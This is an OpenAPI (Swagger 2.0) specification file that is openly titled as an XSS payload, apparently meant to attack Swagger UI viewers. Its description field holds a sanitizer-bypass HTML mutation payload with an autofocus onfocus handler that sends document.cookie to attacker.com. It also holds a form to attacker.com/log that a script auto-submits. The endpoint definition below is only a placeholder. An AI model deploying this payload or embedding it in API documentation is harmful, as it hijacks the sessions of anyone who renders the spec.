swagger: '2.0'
info:
  title: CSP-Compliant Swagger XSS Payload
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea>
    </svg></mtext></mglyph></textarea><form action="https://attacker.com/log" id="xss">
      <input autofocus onfocus="fetch('https://attacker.com?c='+document.cookie)">
    </form><script>document.getElementById('xss').submit()</script>
  version: 1.0.0
paths:
  /test:
    get:
      parameters:
        - name: test
          in: query
          type: string
      responses:
        '200':
          description: Test endpoint
